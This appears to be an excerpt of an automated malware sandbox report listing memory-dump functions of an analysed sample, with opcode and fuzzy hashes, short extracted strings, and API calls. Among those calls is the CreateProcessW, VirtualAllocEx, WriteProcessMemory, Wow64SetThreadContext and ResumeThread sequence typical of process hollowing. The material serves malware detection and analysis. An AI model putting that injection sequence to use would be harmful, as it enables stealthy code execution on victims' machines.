                                                                                        • Instruction ID: 488df67a5673fa22a5a92149a3a61ff9fb309b32d985c4a63b033205e7b28cca
                                                                                        • Opcode Fuzzy Hash: eafc13057d10ec7c7f43a388fc28f791737088f2eb6de1351e6e5deafd2d3ae8
                                                                                        • Instruction Fuzzy Hash: 3781C575E002189FDB18DFA9D890ADEBBB2FF88304F208569E509AB365DB355D41CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be237787ee9080ed27c4dbf3eca05840525e64f1ba6e99abbe95a5200135c6c4
                                                                                        • Instruction ID: 617283b6475d0cad4fc712aeb86e80553b2f097af4fe37b6cc8511088e242737
                                                                                        • Opcode Fuzzy Hash: be237787ee9080ed27c4dbf3eca05840525e64f1ba6e99abbe95a5200135c6c4
                                                                                        • Instruction Fuzzy Hash: F5817970904284CFD754DFA8E984A89BFF6FF89304F15C4AAD809DB269D734A881CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 260b679e232b8c0c8928ae3df0f4fbf5a7ab9e06d74544f8f2cc482a0925af28
                                                                                        • Instruction ID: d92ca2812768608f9bf1cacc6e9b62177bddeb642e0cee91f389706a89c7aedc
                                                                                        • Opcode Fuzzy Hash: 260b679e232b8c0c8928ae3df0f4fbf5a7ab9e06d74544f8f2cc482a0925af28
                                                                                        • Instruction Fuzzy Hash: EC613A70E04209CFDB09CFAAC4546EEFBF6AF89300F24D56AD419A7255D7349A428FA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9425d62a0830e1a5be9e37e4f3bbcef6d13411948885e8fc3c1b0b51a4708bbd
                                                                                        • Instruction ID: 13e2cce445492dcc4438ed432993a2f3b978bc5909f56bff55d34cb53a24a85b
                                                                                        • Opcode Fuzzy Hash: 9425d62a0830e1a5be9e37e4f3bbcef6d13411948885e8fc3c1b0b51a4708bbd
                                                                                        • Instruction Fuzzy Hash: 5351E374E041199FDB08DFA9C580AEEFBF2EF88300F28C566E518A7355D7349982CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c7e3d27e70028cf81381c61b22d2e6c053e832f1d32c6b789a5591f718333116
                                                                                        • Instruction ID: 92044a88cef942d8d25817f1f60f8387d2cb26ce384615d0680581d257dc2045
                                                                                        • Opcode Fuzzy Hash: c7e3d27e70028cf81381c61b22d2e6c053e832f1d32c6b789a5591f718333116
                                                                                        • Instruction Fuzzy Hash: A041AD30E15218CFDB09CFA5D8555DEB7F6FB8D315F20A52AC509F7624D73498018B68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 082e9b40b350f3647348f7e17bb48dc46b73dddf73ebe72e7303ee816c78c3cb
                                                                                        • Instruction ID: 2f2b2fdf1c9776676e83ec9edd9731854c18fca10ec131b0b0912d071ed9c140
                                                                                        • Opcode Fuzzy Hash: 082e9b40b350f3647348f7e17bb48dc46b73dddf73ebe72e7303ee816c78c3cb
                                                                                        • Instruction Fuzzy Hash: C1319A30E15218CBDB09CFA5D8545DEFBFAFB8D315F20A526C10AF7614D73499018B68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4c9d4985325d9895703032f2083f743984f4443736e4557d2e44446336f6d4d8
                                                                                        • Instruction ID: a00dc3b754f4890e49ae6a44710d8a822dfe935edd3ce98a29615e0bee9c6a9a
                                                                                        • Opcode Fuzzy Hash: 4c9d4985325d9895703032f2083f743984f4443736e4557d2e44446336f6d4d8
                                                                                        • Instruction Fuzzy Hash: 1831F971E056188BEB58CFAAD840ADEBBF3AFC9300F14C5BAD408A7265DB341A458F51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7794918a6dd6c5d81a7369183fb777e735410d5482e5f531440bbc2b9bebb9b5
                                                                                        • Instruction ID: a965c1bfc73fda76c9ef286bda039b0cedd509faf1bfaefb24500f7b5eea2ab9
                                                                                        • Opcode Fuzzy Hash: 7794918a6dd6c5d81a7369183fb777e735410d5482e5f531440bbc2b9bebb9b5
                                                                                        • Instruction Fuzzy Hash: 70212671E046588BDB19CFABD8547CEFBF7AFC9300F18C16AD409A6264DB341945CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PJBl$PJBl$PJBl$PJBl$PJBl$PJBl$TNBl
                                                                                        • API String ID: 0-2498673735
                                                                                        • Opcode ID: d4ab907960db35c2ca72d9315c0023e6de34d2738f10cb643afc52560d05736c
                                                                                        • Instruction ID: 49d2147d1572c860ebfabbb7e5755167e243d53b7495b22e4c7e3ae760534186
                                                                                        • Opcode Fuzzy Hash: d4ab907960db35c2ca72d9315c0023e6de34d2738f10cb643afc52560d05736c
                                                                                        • Instruction Fuzzy Hash: 6122D274E00219CFDB24DBA4C881FDDB7B2AF49304F1186AAD919AB751DB30AE85CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PJBl$PJBl$PJBl$TNBl
                                                                                        • API String ID: 0-3017763876
                                                                                        • Opcode ID: 5a25afd161af5a5a07ba483cc1014a952713427781030aed51a8fda71880b89c
                                                                                        • Instruction ID: c384c305b5b85f84ed49a979f9a668bc849e6c52cb2b6fff66372d9b175bd69c
                                                                                        • Opcode Fuzzy Hash: 5a25afd161af5a5a07ba483cc1014a952713427781030aed51a8fda71880b89c
                                                                                        • Instruction Fuzzy Hash: 6B12C174E00218CFDB25DBA8C845FDDB7B2AF49304F1186AAD419AB761DB30AE85CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (+@m$l0@m
                                                                                        • API String ID: 0-704468455
                                                                                        • Opcode ID: 1ff5191af7afdd1f3e9ae54fc3c7b5ccab63427f471d05f784673a679f5358c4
                                                                                        • Instruction ID: de31e199d08319c1d109560680ba1d8d36634a59e46afe715794e49ee11fafc3
                                                                                        • Opcode Fuzzy Hash: 1ff5191af7afdd1f3e9ae54fc3c7b5ccab63427f471d05f784673a679f5358c4
                                                                                        • Instruction Fuzzy Hash: 5E91D574E00618CFDB18DFA5D898BEDBBB2BF89304F209469D40AAB365DB345985CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `!?m$`!?m
                                                                                        • API String ID: 0-952261428
                                                                                        • Opcode ID: 82b713670ab8dbbfbff8397a624b70acdca4e314d478be2c40922df45b2fab32
                                                                                        • Instruction ID: 6ee95560688dcb48e9db488a675f37ab79bca94081b8e22caae494cf8a25a288
                                                                                        • Opcode Fuzzy Hash: 82b713670ab8dbbfbff8397a624b70acdca4e314d478be2c40922df45b2fab32
                                                                                        • Instruction Fuzzy Hash: 8331A0B4D04209CFDB19DFA9C8856EEBBF5FB8D300F10946AD85AA7254D7344981CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003B4DAC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 95538c793498ea59c6be740e521983d933edbc8711bef3c1f6deb44f0ce189bd
                                                                                        • Instruction ID: d9bc7b4247a8d5d62f7437094edb0eea6b3df1e7944f4b1590e57a20bec8df5e
                                                                                        • Opcode Fuzzy Hash: 95538c793498ea59c6be740e521983d933edbc8711bef3c1f6deb44f0ce189bd
                                                                                        • Instruction Fuzzy Hash: D881DF74C00269DFDB21CFA4C940BEDBBB5BF09304F1095AAE559B7261EB309A89CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003B5466
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 84fbd721633d3a00b7c79b9e276387a7de87d2922815f30d783a70c4d3366221
                                                                                        • Instruction ID: 6b4246de310081ac39ca055bb20163b8d98a48e832ae0929ee4ff1fb996460bd
                                                                                        • Opcode Fuzzy Hash: 84fbd721633d3a00b7c79b9e276387a7de87d2922815f30d783a70c4d3366221
                                                                                        • Instruction Fuzzy Hash: 384189B9D002589FCF00CFA9D984ADEFBF5BB49314F24902AE918B7210D374AA45CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003B5466
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: ca53d392b07969f2bcb9ae0d727f24229730b6af48169b1ec7e9bcb967497c3a
                                                                                        • Instruction ID: 786cf1ff40ecfa823ee5c98767d0fc75d906d304f6b77784b7ee97905c94e1db
                                                                                        • Opcode Fuzzy Hash: ca53d392b07969f2bcb9ae0d727f24229730b6af48169b1ec7e9bcb967497c3a
                                                                                        • Instruction Fuzzy Hash: 8D4177B9D012589FCF00CFA9D984ADEFBF5BB49314F24902AE918B7210D375AA45CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003B5205
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 67925f7fe13ca8b9ce99091fb6077614982f8e0fd3f302199d4ab3d96141cab4
                                                                                        • Instruction ID: a0846dfc7edeaf7c0bb8a45837e22be1f090792b218a07a94c262568d6eca3bc
                                                                                        • Opcode Fuzzy Hash: 67925f7fe13ca8b9ce99091fb6077614982f8e0fd3f302199d4ab3d96141cab4
                                                                                        • Instruction Fuzzy Hash: 4F4198B9D00258DFCF10CFA9D884ADEFBB5BB09314F20A42AE814B7210D375AA45CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 003B5325
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 4f9a7b3112e07f7c543017f48e4b79d7733841f0578301cd54cd044e022ef5e5
                                                                                        • Instruction ID: 6bab26cbaa54736f948f38d7b2ddd7f4fde5743a4169e2d4cba2693061394129
                                                                                        • Opcode Fuzzy Hash: 4f9a7b3112e07f7c543017f48e4b79d7733841f0578301cd54cd044e022ef5e5
                                                                                        • Instruction Fuzzy Hash: 484188B8D002589FCF10CFA9D884ADEFBB5BB09314F20A42AE818B7310D375A901CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 003B5325
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 134224c4c227c72d9e73e3f0d3e6ceb964b8ff68666a8f32eb2f2f045ab29c42
                                                                                        • Instruction ID: fa92e64b89b91e479073a945a04defaebe1829281759aea6f0d9217a89d17498
                                                                                        • Opcode Fuzzy Hash: 134224c4c227c72d9e73e3f0d3e6ceb964b8ff68666a8f32eb2f2f045ab29c42
                                                                                        • Instruction Fuzzy Hash: CE3177B8D042589FCF10CFA9D884ADEFBB5BB49314F20A01AE818B7310D375A945CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 003B50E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 773fe91898170bbd2ced11872d9306a84d0b77d7d4e9638f0e0d42fe8f3df884
                                                                                        • Instruction ID: d6e42e942ceeebb164af65bbe5b1510ff78dff178c7e293318888f5fb91c4d74
                                                                                        • Opcode Fuzzy Hash: 773fe91898170bbd2ced11872d9306a84d0b77d7d4e9638f0e0d42fe8f3df884
                                                                                        • Instruction Fuzzy Hash: A9419AB4D012189FCF10CFA9D884ADEFBF5BB49314F24902AE518B7250D779AA45CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 003B50E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 21b2ffeea41d36deb956adeb0da7d2cb10851205aaccd60322dbcee459e08842
                                                                                        • Instruction ID: 05b264abe32a2d3782b20668e2bcde974f581a277386076e2df2acd0510ce889
                                                                                        • Opcode Fuzzy Hash: 21b2ffeea41d36deb956adeb0da7d2cb10851205aaccd60322dbcee459e08842
                                                                                        • Instruction Fuzzy Hash: 4A41A7B4D012189FCF10CFA9D884ADEFBF5BB49314F24902AE418B7210D779AA45CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(?), ref: 003B563E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: e4adae2e583cba314bf9c6014dc47988dbda0656166244cae78bcfe1f5cf3425
                                                                                        • Instruction ID: cf88c8d8f6ff9cc432d4776fc140ac4bd92c58924c6e40ffd1378a90569850a3
                                                                                        • Opcode Fuzzy Hash: e4adae2e583cba314bf9c6014dc47988dbda0656166244cae78bcfe1f5cf3425
                                                                                        • Instruction Fuzzy Hash: 1831ACB8D002189FCF10CFA9D884ADEFBF4AB49314F24945AE815B7310D375A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(?), ref: 003B563E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228996074.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: ed52f50ab169fff3c0e02e502906fdcac495245bd12a84a8198ed416a99f3113
                                                                                        • Instruction ID: 2dd5f2151b40c9cc1c9ec3b5daa297572e3af6c1a8563c8a4e648764f64747da
                                                                                        • Opcode Fuzzy Hash: ed52f50ab169fff3c0e02e502906fdcac495245bd12a84a8198ed416a99f3113
                                                                                        • Instruction Fuzzy Hash: 5131AAB8D002189FCB10CFA9D884ADEFBF4AB49314F24941AE918B7310D335A941CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: t?m
                                                                                        • API String ID: 0-326825507
                                                                                        • Opcode ID: 1f680e5d98262857681ef742679ef5b4e0f81c4a32d7589bdd9a10047b977b58
                                                                                        • Instruction ID: 73c1f3571320966a5932f738ad51855e0e5eab0f19e9f64f415e1e17a54918f0
                                                                                        • Opcode Fuzzy Hash: 1f680e5d98262857681ef742679ef5b4e0f81c4a32d7589bdd9a10047b977b58
                                                                                        • Instruction Fuzzy Hash: EF912730D04218DFDB25CFA5C844BEDFBB2BF89314F1484A9D508AB251DB319A85CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \-zl
                                                                                        • API String ID: 0-31327930
                                                                                        • Opcode ID: d7aa0401f98564ce835abed7bdbcee2b07044b1dfea612e83bbcc331a7481b8f
                                                                                        • Instruction ID: 61a963baaddc8a53ca067e5bc6aa21ac0432c8aab3923d956c9c4013605f6f0e
                                                                                        • Opcode Fuzzy Hash: d7aa0401f98564ce835abed7bdbcee2b07044b1dfea612e83bbcc331a7481b8f
                                                                                        • Instruction Fuzzy Hash: BD41E374E052189FDB08CFA5D880ADEBBB2BF89300F249129E805BB364DB345942CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: c;F
                                                                                        • API String ID: 0-3267592082
                                                                                        • Opcode ID: 136be03cccb9fcc35d32e0b3b1beaacc71fb1e6ad9785a0caf133dae88c827b2
                                                                                        • Instruction ID: 37dbc6d14f2c9321233f9ff01d5b67f3b2a9598d5e4b711f5a49ba875322cef5
                                                                                        • Opcode Fuzzy Hash: 136be03cccb9fcc35d32e0b3b1beaacc71fb1e6ad9785a0caf133dae88c827b2
                                                                                        • Instruction Fuzzy Hash: BF012670E1030CEFD709DFB4E90828DBBB2AB8D310F20C4A6C408D3210EA348E999A58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: c;F
                                                                                        • API String ID: 0-3267592082
                                                                                        • Opcode ID: 45fe0ab38da230522c569b30527bba862ee9cd53e8f9170da3d054406bb77377
                                                                                        • Instruction ID: aeb663a6d281ba8666e11bad5e8daca658afb3f3b6d7f2ebe7ad987ea4f0705e
                                                                                        • Opcode Fuzzy Hash: 45fe0ab38da230522c569b30527bba862ee9cd53e8f9170da3d054406bb77377
                                                                                        • Instruction Fuzzy Hash: 21F04C30E0020CEFD708DFB4D94429DBBF6EB8D300F20C465C409D3610EB348A95DA65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f7b1c31f9aa84058c1645b88ea9e2a765afefdb46e94f94d9ba3223ca3f03b3
                                                                                        • Instruction ID: f31634f14a0487bff7b0ec97267a5564d91902f978f265d48c96683cc418c3e1
                                                                                        • Opcode Fuzzy Hash: 8f7b1c31f9aa84058c1645b88ea9e2a765afefdb46e94f94d9ba3223ca3f03b3
                                                                                        • Instruction Fuzzy Hash: ED12CB74A011198FCB64EF64CD99ADEB3B6AF85309F108AE9801D6B360DB345EC5CF85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d9a48afbc47fe395a18ba2a890b732afd8eca100994ab2998dacf5359bc662bb
                                                                                        • Instruction ID: acccd8fb9acd207a002f48d7d8d790144ff178b2ed096a375e305cd1951e1558
                                                                                        • Opcode Fuzzy Hash: d9a48afbc47fe395a18ba2a890b732afd8eca100994ab2998dacf5359bc662bb
                                                                                        • Instruction Fuzzy Hash: 0412BB74A0111D8BCB64EF64CD99ADEB3B6AF85309F108AE9801D6B360DB345EC5CF85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4956ac96313f119a97ae6ab3b4c88aa2cb5a58072ab1d092dcca51f4891f01ee
                                                                                        • Instruction ID: 6546e4c5403c6aa95a69a32ac169354707743801b1bfce75224b88b7b23cb522
                                                                                        • Opcode Fuzzy Hash: 4956ac96313f119a97ae6ab3b4c88aa2cb5a58072ab1d092dcca51f4891f01ee
                                                                                        • Instruction Fuzzy Hash: F7617C70900248DFD754EFA8E98498DBBF6FB88315F14C465E9099B328DB34AD81CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2aca3172a38905032599c501cb34d5685039fcd9a8b3c35afb7398a05d4b70e2
                                                                                        • Instruction ID: 4499e1c2861627690f0c9b2de96d5faaca59de73632bcb4174640a651e8ed0d0
                                                                                        • Opcode Fuzzy Hash: 2aca3172a38905032599c501cb34d5685039fcd9a8b3c35afb7398a05d4b70e2
                                                                                        • Instruction Fuzzy Hash: 7F611974A00248DFD754EFA8E98498DBBF6FB98311F14C565E80AAB328D7349D81CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 37a307a7f807af1434cc9073083556c085724b8915b4e92e9ccc106023c1d6ca
                                                                                        • Instruction ID: 516853399402d8c8d173e59bdb4f4fb466e580541ed0a62912d6d066fe94e60f
                                                                                        • Opcode Fuzzy Hash: 37a307a7f807af1434cc9073083556c085724b8915b4e92e9ccc106023c1d6ca
                                                                                        • Instruction Fuzzy Hash: 3351BF74E41218EFCB08DFA9D488AEDBBB1FF49314F1180A9E809A7365D730A991CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8fe893a940ac1f7bc5397a2513d1b39b2771feca53da4b11fbdcab87fd65e1ea
                                                                                        • Instruction ID: 4efa624aa3685ee21b3ddb67c9b6780c10fee90d35975193a5d34f9494eca540
                                                                                        • Opcode Fuzzy Hash: 8fe893a940ac1f7bc5397a2513d1b39b2771feca53da4b11fbdcab87fd65e1ea
                                                                                        • Instruction Fuzzy Hash: 00513674A00244DFD754EFA8E98498DBBF6FB88315F15C465E809EB329D734A881CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0aedc6d0bafbcc873a3c891b226295adebba1369d18a76c98b05fee5589cd4e8
                                                                                        • Instruction ID: 26a03a266dfab0bd04e91eae152b30802d6814538654a7d0b4e8e862d5a4d1c3
                                                                                        • Opcode Fuzzy Hash: 0aedc6d0bafbcc873a3c891b226295adebba1369d18a76c98b05fee5589cd4e8
                                                                                        • Instruction Fuzzy Hash: C951DD74E01218CFCB08DFA9D484AEDBBB2FF48304F558869E415B7394DB35A996CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1c78bdbf4d3013796d7ee38c66c166195df9803f9af8cf4e1422399e92f46390
                                                                                        • Instruction ID: 2bba0be241d7f7897a8b65ae799d15caa69df9d24278c53641685435886ef78e
                                                                                        • Opcode Fuzzy Hash: 1c78bdbf4d3013796d7ee38c66c166195df9803f9af8cf4e1422399e92f46390
                                                                                        • Instruction Fuzzy Hash: 4A511374E14208DFCB09CFA9D894AEEFBB2BF88300F54916AE511A7311DB309995CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2228968540.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5cd81b6ae861ad535415229d98801e6e56b37cfb0329189f35a9d9a57381569e
                                                                                        • Instruction ID: c7fa333d9da90c931ebe6ac75d6bd9a200f186f41e98fab9e3a866de85e4e934
                                                                                        • Opcode Fuzzy Hash: 5cd81b6ae861ad535415229d98801e6e56b37cfb0329189f35a9d9a57381569e
                                                                                        • Instruction Fuzzy Hash: A041F774E042089FDB05DFA9D890ADEBBF6FF89300F14846AE805A7361D7345941CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
